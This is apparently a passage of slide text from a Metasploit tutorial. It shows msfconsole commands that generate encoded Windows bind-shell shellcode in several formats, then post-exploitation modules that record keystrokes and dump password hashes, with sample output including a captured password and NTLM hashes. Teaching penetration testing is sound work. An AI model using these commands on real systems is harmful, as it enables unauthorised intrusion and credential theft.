msf6 payload(windows/shell_bind_tcp) > generate -b '\x00' -i 2# windows/shell_bind_tcp - 382 bytes# https://metasploit.com/# Encoder: x86/shikata_ga_nai# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xdb\xd7\xb8\x62\xa2\x5d\x22\xd9\x74\x24\xf4\x5d\x29\xc9" +"\xb1\x59\x31\x45\x1a\x83\xc5\x04\x03\x45\x16\xe2\x97\x7b" +"\xb6\x9a\xd6\x05\x5e\xbc\x01\x81\x44\xb6\xec\x5b\x4c\x87" +"\x5d\xad\x0b\xff\xe2\x08\x97\xfc\x20\xf8\x6d\x90\x92\x99" +...

Generated payload with 2 passes

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00' -i 5# windows/shell_bind_tcp - 463 bytes# https://metasploit.com/# Encoder: x86/shikata_ga_nai# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xda\xd3\xba\x65\x90\x59\xf3\xd9\x74\x24\xf4\x58\x31\xc9" +"\xb1\x6e\x31\x50\x17\x03\x50\x17\x83\x8d\x6c\xbb\x06\x97" +"\x45\x83\x62\xb8\xf1\x9f\xad\xb2\xd9\xab\x10\x11\xeb\xe5" +"\xca\xe6\x05\xf9\x24\x96\xcd\x01\x39\xf9\x93\x57\x1c\xe9" +...

Generated payload with 5 passes

Example (generate payload with different coding format)

63

msf6 payload(windows/shell_bind_tcp) > generate# windows/shell_bind_tcp - 328 bytes# https://metasploit.com/# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +...

Generated payload

msf6 payload(windows/shell_bind_tcp) > generate -f c/* * windows/shell_bind_tcp - 328 bytes * https://metasploit.com/ * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, * EXITFUNC=process, CreateSession=true */unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52""\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"...

Generated payload in C

msf6 payload(windows/shell_bind_tcp) > generate -f java/* * windows/shell_bind_tcp - 328 bytes * https://metasploit.com/ * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, * EXITFUNC=process, CreateSession=true */byte buf[] = new byte[]{ (byte) 0xfc, (byte) 0xe8, (byte) 0x82, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x60, (byte) 0x89, (byte) 0xe5, (byte) 0x31, (byte) 0xc0, (byte) 0x64, (byte) 0x8b, (byte) 0x50, (byte) 0x30, (byte) 0x8b, (byte) 0x52, (byte) 0x0c, (byte) 0x8b, (byte) 0x52, (byte) 0x14, (byte) 0x8b, (byte) 0x72, (byte) 0x28, (byte) 0x0f, (byte) 0xb7, (byte) 0x4a, (byte) 0x26, (byte) 0x31, (byte) 0xff, (byte) 0xac, (byte) 0x3c,...

Generated payload in Java

Example (generate payload with NOP sled)

64

msf6 payload(windows/shell_bind_tcp) > generate# windows/shell_bind_tcp - 328 bytes# https://metasploit.com/# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +...

Generated payloadmsf6 payload(windows/shell_bind_tcp) > generate -n 14# windows/shell_bind_tcp - 342 bytes# https://metasploit.com/# NOP gen: x86/single_byte# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, # EXITFUNC=process, CreateSession=truebuf = "\x93\x97\xf9\x9b\x47\x55\x5f\x5b\x5f\x95\x43\x49\x2f\x51" +"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +...

Generated payload with NOP sled

Demo65

Post module

66

Overview

67

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/capturekeylog_recorder.rb lockout_keylogger.rb

Types

● Capture● Gather● Manage

Gather post modules

Capture post modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/gatherad_to_sqlite.rb enum_ad_to_wordlist.rb enum_emet.rb enum_snmp.rb outlook.rbarp_scanner.rb enum_ad_user_comments.rb enum_files.rb enum_termserv.rb phish_windows_credentials.rbavast_memory_dump.rb enum_ad_users.rb enum_hostfile.rb enum_tokens.rb psreadline_history.rbbitcoin_jacker.rb enum_applications.rb enum_hyperv_vms.rb enum_tomcat.rb resolve_sid.rbbitlocker_fvek.rb enum_artifacts.rb enum_ie.rb enum_trusted_locations.rb reverse_lookup.rbbloodhound.rb enum_av_excluded.rb enum_logged_on_users.rb enum_unattend.rb screen_spy.rbcachedump.rb enum_chrome.rb enum_ms_product_keys.rb file_from_raw_ntfs.rb smart_hashdump.rbcheckvm.rb enum_computers.rb enum_muicache.rb forensics tcpnetstat.rbcredentials enum_db.rb enum_onedrive.rb ...

Manage post moduleskali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/manageadd_user.rb forward_pageant.rb nbd_server.rb rid_hijack.rb vss_list.rbarchmigrate.rb hashcarve.rb peinjector.rb rollback_defender_signatures.rb vss_mount.rbchange_password.rb ie_proxypac.rb persistence_exe.rb rpcapd_start.rb vss.rbclone_proxy_settings.rb inject_ca.rb portproxy.rb run_as_psh.rb vss_set_storage.rbdelete_user.rb inject_host.rb powershell run_as.rb vss_storage.rb ...

Structure

68

kali@kali:~# ls /usr/share/metasploit-framework/modules/postaix android apple_ios bsd firefox hardware linux multi networking osx solaris windows

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windowscapture escalate gather manage recon wlan

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/capturekeylog_recorder.rb lockout_keylogger.rb

Operating system (modules/post )

Post type (modules/post/* )

Tool (modules/post/*/* )

Commands

69

msf6 > use multi/gather/apple_ios_backupmsf6 post(multi/gather/apple_ios_backup) > help

...Post Commands=============

Command Description ------- ----------- check Check to see if a target is vulnerable exploit This is an alias for the run command reload Reload the current module from disk rerun Reloads and launches the module rexploit This is an alias for the rerun command run Launches the post exploitation module

Using a post module adds new post-specific commands

Example (capture post)

70

msf6 > use post/windows/capture/keylog_recorder meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against V-MAC-XP[*] Starting the keystroke sniffer...[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt[*] Recording keystrokes...^C[*] Saving last few keystrokes...[*] Interrupt [*] Stopping keystroke sniffer...

msf6 post(keylog_recorder) > sessions -i 1[*] Starting interaction with 1...

1. Pick the module

2. Switch to interactive session

3. Run the module

kali@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txtKeystroke log started at Thu Apr 21 12:03:55 -0600 2011root s3cr3tftp ftp.microsoft.com anonymous anon@anon.com e quit

4. Inspect generated file

Example (gather post)

71

msf6 > use post/windows/gather/hashdump

1. Pick the modulemeterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...

Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::

msf6 post(hashdump) > sessions -i 1[*] Starting interaction with 1...

2. Switch to interactive session

3. Run the module

Example (manage post)

72

msf6 > use post/windows/manage/delete_user

1. Pick the module

meterpreter > run post/windows/manage/delete_user USERNAME=hacker

[*] User was deleted!

msf6 post(hashdump) > sessions -i 1[*] Starting interaction with 1...

2. Switch to interactive session

3. Run the module

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...

Administrator:500:7bf4f254b228bb24aad1b435b51404ee:2892d26cdf84d7a70e2fb3b9f05c425e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::

4. Verify

Demo73

Conclusion

74

Next steps

75

● Metasploit development○ Writing your own scanner○ Writing your own fuzzer○ Writing your own exploit○ Writing your own module

● Metasploit tools○ Using the msfdb○ Using the meterpreter

● Other tools○ Using nexpose○ Using nessus

Sources

76

https://en.wikipedia.org/wiki/Metasploit_Project

https://blog.eccouncil.org/what-is-metasploit-and-how-is-it-used-in-penetration-testing/

https://hydrasky.com/network-security/metasploit-tutorial-part1/

https://www.offensive-security.com/metasploit-unleashed/

https://tools.kali.org/exploitation-tools/metasploit-framework

https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/

https://blog.rapid7.com

https://docs.rapid7.com/metasploit/quick-start-guide

https://github.com/rapid7/metasploit-framework

https://enlyft.com/tech/products/metasploit

https://linuxhint.com/metasploit_usage_examples/